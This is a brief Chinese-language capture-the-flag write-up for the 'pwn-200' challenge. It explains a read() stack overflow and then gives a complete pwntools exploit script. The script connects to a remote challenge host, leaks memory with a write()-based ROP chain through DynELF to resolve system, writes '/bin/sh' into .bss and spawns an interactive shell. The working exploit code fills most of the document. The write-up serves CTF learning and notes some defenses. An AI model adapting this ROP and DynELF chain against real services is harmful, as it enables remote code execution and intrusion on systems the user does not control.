pwn-200
题目链接 https://adworld.xctf.org.cn/media/task/attachments/49bd95c78386423997fa044a9e750015
借鉴
https://www.cnblogs.com/deerCode/p/11919638.html
https://blog.csdn.net/qq_43986365/article/details/95752798
read存在栈溢出
没有libc,也没有后门函数可以直接调用
用DynELF泄露出system地址,调用read在bss段写入/bin/sh,再用pppr(pop;pop;pop;ret)gadget平衡栈后执行system
exp如下
# Exploit script for the pwn-200 challenge, written in Python 2 / pwntools
# syntax (`print r.recv()`). Vulnerability class: read() into a fixed-size
# stack buffer without a length check (112 bytes of padding reach the saved
# return address). No libc is shipped, so system()'s address is resolved at
# runtime with DynELF through a write()-based leak primitive.
# Defensive takeaways: a bounded read (or a stack canary / FORTIFY) stops the
# overflow; PIE would invalidate the hard-coded PLT and gadget addresses below.
from pwn import *

r=remote('111.198.29.45',53833)
elf=ELF('pwn-200')
write_plt=elf.plt['write']   # fixed PLT addresses: the binary is evidently not PIE
read_plt=elf.plt['read']
start_addr=0x80483d0         # presumably _start (re-enter the program) -- verify in the binary
func_addr=0x08048484         # presumably the vulnerable function; used as the return address after each call
ppp_addr=0x080485cd          # presumably a pop;pop;pop;ret gadget that discards read()'s three arguments

def leak(addr):
    # Leak callback for DynELF: overflow the buffer, call write(1, addr, 4),
    # then return into func_addr so the next leak request can be issued.
    payload1='a'*112+p32(write_plt)+p32(func_addr)+p32(1)+p32(addr)+p32(4)
    r.sendline(payload1)
    data=r.recv(4)
    return data

print r.recv()
d=DynELF(leak,elf=elf)            # resolve symbols in the remote process using the leak primitive
sys_addr=d.lookup('system','libc')
payload2='a'*112+p32(start_addr)  # presumably restarts the program for a fresh stack before the final chain
r.sendline(payload2)
print r.recv()
bss_addr=elf.bss()                # writable, fixed-address scratch space for the "/bin/sh" string
# Chain: read(0, bss_addr, 8) -> pop;pop;pop;ret -> system(bss_addr), with
# func_addr as system()'s return address.
payload3='a'*112+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_addr)+p32(8)
payload3+=p32(sys_addr)+p32(func_addr)+p32(bss_addr)
r.sendline(payload3)
r.sendline('/bin/sh')             # consumed by the read(0, bss_addr, 8) call above
r.interactive()